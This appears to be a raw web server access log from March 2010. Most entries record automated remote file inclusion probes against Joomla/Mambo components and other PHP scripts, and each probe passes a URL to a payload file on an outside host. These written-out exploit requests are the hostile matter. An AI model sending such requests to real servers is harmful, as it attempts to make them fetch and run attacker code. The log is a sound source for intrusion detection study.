69.112.170.135 - - [05/Mar/2010:04:21:57 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:21:57 -0800] "GET /logs/access_100219.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:21:58 -0800] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:22:25 -0800] "GET /logs/access_100201.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:22:25 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:22:25 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:22:39 -0800] "GET /logs/access_100210.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:22:40 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:22:42 -0800] "GET /logs/access_100224.log//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:22:44 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:23:09 -0800] "GET /logs/access_100219.log%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
69.112.170.135 - - [05/Mar/2010:04:23:14 -0800] "GET /logs/access_100219.log%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://ess.uvic.ca/files/photologue/photos/frosh2008/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:23:43 -0800] "GET /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:23:49 -0800] "GET /logs//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:23:58 -0800] "GET /logs/access_100206.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:24:18 -0800] "GET /logs/access_100206.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:24:25 -0800] "GET /logs/access_100208.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:24:25 -0800] "GET /logs/access_100126.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:24:32 -0800] "GET /logs/access_100206.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:24:33 -0800] "GET /logs/access_100126.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:04:24:33 -0800] "GET /logs/access_100208.log%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:24:36 -0800] "GET /logs/access_100206.log%20%20//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:25:07 -0800] "GET /logs/access_100129.log//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:25:26 -0800] "GET /logs/access_100224.log//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:25:42 -0800] "GET /com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:25:42 -0800] "GET /logs/access_100129.log//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:25:42 -0800] "GET /logs//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:26:12 -0800] "GET /logs/access_100224.log//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:04:27:44 -0800] "GET /logs/administrator/components/com_moofaq/css/file_includer.php?file=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:04:27:44 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:04:27:44 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_moofaq/css/file_includer.php?file=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:29:24 -0800] "GET /com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:29:24 -0800] "GET /logs/access_100129.log//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:29:24 -0800] "GET /logs//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:29:56 -0800] "GET /logs/access_100224.log//com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:30:32 -0800] "GET /logs/access_100206.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:30:44 -0800] "GET /logs/access_100206.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:04:30:46 -0800] "GET /logs/access_100206.log//com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:31:36 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:31:36 -0800] "GET /logs/access_100209.log//upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:31:41 -0800] "GET /logs//upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [05/Mar/2010:04:32:04 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [05/Mar/2010:04:32:04 -0800] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [05/Mar/2010:04:32:05 -0800] "GET /logs/access_100126.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [05/Mar/2010:04:32:12 -0800] "GET /logs/access_100208.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:33:35 -0800] "GET /appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:33:35 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:33:35 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.182.63.46 - - [05/Mar/2010:04:33:39 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:04:33:42 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:04:33:42 -0800] "GET /logs/access_100201.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:04:33:43 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:34:16 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:34:16 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:34:16 -0800] "GET /logs/access_100204.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:35:03 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:35:25 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:35:25 -0800] "GET /logs/access_100220.log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:35:39 -0800] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:35:39 -0800] "GET /logs/access_100220.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:35:39 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:36:49 -0800] "GET /logs/access_100217.log//upgrade_album.php?GALLERY_BASEDIR=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:38:06 -0800] "GET /appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:38:06 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:38:06 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:38:36 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:38:39 -0800] "GET /logs/access_100212.log//appserv/main.php?appserv_root=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [05/Mar/2010:04:39:35 -0800] "GET /logs/access_100224.log/administrator/components/com_moofaq/css/file_includer.php?file=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [05/Mar/2010:04:40:04 -0800] "GET / HTTP/1.1" 200 468 "http://www.macdomain.org/forums.php?m=posts&q=30&n=last" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "pixero.net"
72.4.236.8 - - [05/Mar/2010:04:41:39 -0800] "GET /logs/access_100203.log%20%20//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:41:39 -0800] "GET /////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:41:39 -0800] "GET /logs//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:41:49 -0800] "GET /logs/access_100206.log%20%20//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:42:13 -0800] "GET /logs/access_100203.log//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:42:13 -0800] "GET /////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:42:13 -0800] "GET /logs//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:20 -0800] "GET /logs/access_100219.log/?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:20 -0800] "GET /logs/?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:21 -0800] "GET /?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:42:21 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:42:21 -0800] "GET /logs/access_100204.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [05/Mar/2010:04:42:21 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [05/Mar/2010:04:42:22 -0800] "GET /logs/access_100206.log//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:46 -0800] "GET /logs/?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:47 -0800] "GET /?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:47 -0800] "GET /logs/access_100219.log%20%20/?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:04:42:49 -0800] "GET /logs/access_091113.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:04:42:50 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091113.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:04:42:50 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_091113.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:04:42:55 -0800] "GET /logs/access_100214.log/?component_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:43:48 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:43:48 -0800] "GET /logs/access_100201.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:43:48 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:04:44:13 -0800] "GET /logs/access_100126.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:46:05 -0800] "GET /signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:46:05 -0800] "GET /logs/access.log//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:46:06 -0800] "GET /logs//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:04:46:24 -0800] "GET /logs/access_100225.log//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:04:49:32 -0800] "GET /errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:04:49:32 -0800] "GET /logs//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:04:49:32 -0800] "GET /logs/access_100129.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [05/Mar/2010:04:50:06 -0800] "GET /logs/access_091101.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:51:00 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:51:00 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:51:00 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:04:51:18 -0800] "GET /logs/access_100224.log%20%20//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:04:53:21 -0800] "GET /logs/access_091220.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:04:53:21 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
69.163.150.203 - - [05/Mar/2010:04:53:22 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:54:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:54:32 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:04:54:35 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:04:54:38 -0800] "GET /logs/access_100225.log%20%20//signin.php?_AMGconfig[cfg_serverpath]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
